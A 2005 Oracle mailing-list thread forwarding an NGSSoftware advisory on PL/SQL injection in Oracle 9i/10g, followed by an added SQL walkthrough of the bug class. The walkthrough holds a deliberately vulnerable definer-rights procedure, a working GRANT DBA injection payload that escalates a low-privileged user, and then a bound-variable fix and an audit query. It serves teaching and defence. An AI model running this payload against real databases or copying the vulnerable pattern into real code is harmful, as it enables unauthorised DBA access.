I just got the email from Oracle about this. I guess it's real.
Ruth

-----Original Message-----
From: oracle-l-bounce@xxxxxxxxxxxxx [mailto:oracle-l-bounce@xxxxxxxxxxxxx] On Behalf Of Don Granaman
Sent: Wednesday, January 19, 2005 10:30 AM
To: rgramolini@xxxxxxxxxxxxxxx; oracle-l
Subject: Re: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i

This same "alert" was forwarded to me yesterday also. I could find no such patch - or any other related information on Metalink or OTN's security alerts. The most recent (unrelated) security alert I could find was from Dec 17, 2004.

-Don Granaman

----- Original Message -----
From: "Ruth Gramolini" <rgramolini@xxxxxxxxxxxxxxx>
To: "oracle-l" <oracle-l@xxxxxxxxxxxxx>
Sent: Tuesday, January 18, 2005 11:52 AM
Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i

> I just received this from my SA, Claus. Has anyone applied this patchset?
> Does anyone know the details?
>
> Inquiring minds want to know.
> Ruth
>
> -----Original Message-----
> From: Claus Lund [mailto:clund@xxxxxxxxxxxxxxx]
> Sent: Tuesday, January 18, 2005 11:30 AM
> To: Ruth Gramolini
> Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i
>
>
> I don't know if you heard about this yet...
>
> -Claus
>
> -----Original Message-----
> From: NGSSoftware Insight Security Research [mailto:nisr@xxxxxxxxxxxxx]
> Sent: Tuesday, January 18, 2005 10:33 AM
> To: bugtraq@xxxxxxxxxxxxxxxxx; ntbugtraq@xxxxxxxxxxxxxxxxxxxxxx; vulnwatch@xxxxxxxxxxxxx
> Subject: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i
>
>
> Researchers at NGSSoftware have discovered multiple high risk vulnerabilities in the Oracle Database Server. Versions affected include:
>
> Oracle Database 10g - All Releases
> Oracle9i Database Server - All Releases
>
> The vulnerabilities include PL/SQL Injection vulnerabilities that allow low privileged users to gain DBA privileges and a buffer overflow vulnerability. The former can be exploited via the web through Oracle Application Server. Oracle has released a patch set (18/01/2005) to address these issues. Oracle database administrators are urged to download, test and install the patch set as soon as possible. See http://metalink.oracle.com/ for more details.
>
> NGSSoftware are going to withhold details about these flaws for three months. Full details will be published on the 18th of April 2005. This three-month window will allow Oracle database administrators the time needed to test and apply the patch set before the details are released to the general public. This reflects NGSSoftware's new approach to responsible disclosure.
>
> NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment scanner and security manager for Oracle, has been updated to check for and positively identify these flaws in Oracle database servers on the network. More information about NGSSQuirreL for Oracle can be found at http://www.ngssoftware.com/squirrelora.htm.
>
> NGSSoftware Insight Security Research
> http://www.ngssoftware.com/
> +44(0)208 401 0070
>
>
>
> --
> //www.freelists.org/webpage/oracle-l
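The advisory quoted above names the bug class (PL/SQL injection in a definer-rights unit that lets a low-privileged user reach DBA) but withholds the specifics, so nothing below is the NGSSoftware finding, Oracle code, or anything from the thread. It is an added illustration of the general pattern as it applied to 9i/10g: a hypothetical definer-rights procedure in a privileged schema that concatenates its argument into dynamic SQL, the classic injected payload (an invoker-rights function with an autonomous transaction that issues GRANT DBA), the same procedure with the input bound, and a DBA_SOURCE query to inventory PUBLIC-executable units that use dynamic SQL. The schemas APPOWNER and LOWUSER, the EMP table and every object name are assumptions; APPOWNER is assumed to hold DBA WITH ADMIN OPTION. Later releases changed the privilege-inheritance step (12c's INHERIT PRIVILEGES can block it once the default grant is revoked).

```sql
-- Added example of the bug class, not the withheld NGSSoftware flaw.
-- Names (APPOWNER, LOWUSER, EMP, LOOKUP_EMP, ESCALATE) are assumptions.

-- 1. Setup, run as APPOWNER (assumed to hold DBA WITH ADMIN OPTION, so a
--    GRANT DBA issued with its privileges succeeds).
CREATE TABLE appowner.emp (ename VARCHAR2(30));
INSERT INTO appowner.emp VALUES ('SCOTT');
COMMIT;

-- 2. Vulnerable definer-rights procedure: p_name is spliced into the statement,
--    which then runs with APPOWNER's privileges for anyone allowed to execute it.
CREATE OR REPLACE PROCEDURE appowner.lookup_emp (p_name IN VARCHAR2)
AUTHID DEFINER IS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM appowner.emp WHERE ename = ''' || p_name || ''''
    INTO v_cnt;
  DBMS_OUTPUT.PUT_LINE('matches: ' || v_cnt);
END;
/
GRANT EXECUTE ON appowner.lookup_emp TO PUBLIC;

-- 3. Attacker, run as LOWUSER (holds only CREATE SESSION and CREATE PROCEDURE).
--    AUTHID CURRENT_USER makes the function take the privileges of whatever
--    context calls it; PRAGMA AUTONOMOUS_TRANSACTION makes DDL legal from
--    inside a SELECT. Called from the definer-rights procedure, the GRANT
--    runs as APPOWNER.
CREATE OR REPLACE FUNCTION lowuser.escalate RETURN NUMBER
AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO lowuser';
  COMMIT;
  RETURN 1;
END;
/
GRANT EXECUTE ON lowuser.escalate TO PUBLIC;

-- 4. Injection, run as LOWUSER. The concatenated statement becomes:
--    SELECT COUNT(*) FROM appowner.emp WHERE ename = 'x' OR lowuser.escalate = 1 --'
--    escalate is evaluated for the row that fails ename = 'x', the GRANT
--    commits inside the autonomous transaction, and "--" comments out the
--    closing quote the procedure appended.
BEGIN
  appowner.lookup_emp('x'' OR lowuser.escalate = 1 --');
END;
/
SELECT granted_role FROM user_role_privs;   -- now lists DBA (active in a new session)

-- 5. Hardened version: bind the value, so the input is data, not statement text.
--    Static SQL is better still; where an identifier (table, column) must be
--    dynamic, validate it with DBMS_ASSERT.SIMPLE_SQL_NAME (10gR2 onward)
--    instead of concatenating it, and reconsider granting EXECUTE to PUBLIC.
CREATE OR REPLACE PROCEDURE appowner.lookup_emp (p_name IN VARCHAR2)
AUTHID DEFINER IS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM appowner.emp WHERE ename = :name'
    INTO v_cnt USING p_name;
  DBMS_OUTPUT.PUT_LINE('matches: ' || v_cnt);
END;
/

-- 6. Inventory check, run as a DBA: PL/SQL units executable by PUBLIC whose
--    source uses dynamic SQL. Each hit is a candidate for the pattern above and
--    should be reviewed for concatenated input and for whether it really needs
--    to be definer-rights.
SELECT DISTINCT s.owner, s.name, s.type
FROM   dba_source s
JOIN   dba_tab_privs p
       ON p.owner = s.owner AND p.table_name = s.name
WHERE  p.grantee   = 'PUBLIC'
AND    p.privilege = 'EXECUTE'
AND    s.type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY', 'TYPE BODY')
AND   (UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
    OR UPPER(s.text) LIKE '%DBMS_SQL.%')
ORDER  BY s.owner, s.name;
```

The payload in step 4 works only because the procedure is definer-rights and the injected function is invoker-rights: the function's EXECUTE IMMEDIATE inherits APPOWNER's privileges for the duration of the call. The bound version in step 5 keeps the same behaviour for legitimate callers, but the argument can no longer alter the statement shape, so no function call can be smuggled into it. The query in step 6 only narrows the review set; a unit that builds SQL with concatenation but is not exposed to PUBLIC is still worth a look if its EXECUTE grantees are low-privileged roles.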